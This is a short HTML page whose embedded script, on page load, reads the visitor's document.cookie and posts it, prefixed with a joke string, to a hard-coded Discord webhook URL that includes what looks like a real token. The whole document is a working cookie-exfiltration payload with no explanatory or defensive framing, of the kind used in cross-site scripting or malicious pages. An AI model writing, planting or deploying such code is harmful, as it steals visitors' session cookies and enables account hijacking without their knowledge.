<!DOCTYPE HTML>
<html>
<body>

<script>
  function sendToDiscord(message) {
    const webhookUrl = 'https://discord.com/api/webhooks/719183031541432380/N_JvkHjMU7evNfsEknW6J77c-JWF9yhzhadr6G-A_2Dtm-SFk9l8KM8TTZB-PQP84i_u';

    // Create a POST request to the Discord webhook URL
    fetch(webhookUrl, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({
            content: message // Your message here
        })
    })
    .then(response => response.text())
    .then(result => console.log(result))
    .catch(error => console.error('Error:', error));
}


sendToDiscord("poop" + document.cookie);

</script>
</body>
</html>
